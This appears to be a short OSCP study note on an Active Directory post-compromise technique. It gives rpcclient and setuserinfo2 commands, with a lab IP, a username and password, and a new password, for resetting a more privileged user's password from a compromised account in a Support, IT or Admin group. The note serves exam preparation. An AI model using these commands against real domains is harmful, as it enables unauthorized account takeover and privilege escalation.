// notes/ Active Directory
🏛️
Post Compromise Attacks Rpc Password Change
{% hint style="info" %}
#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_rpc-password-change ↗RPC Password Change
{% hint style="info" %} If your compromised user is ever apart of a "Support" "IT" or "Admin" group, try resetting another user with more privileges password {% endhint %}
code
01rpcclient -N 192.168.193.40 -U IT_User%haze1988code
01setuserinfo2 John.Smith 23 'Pwned123!'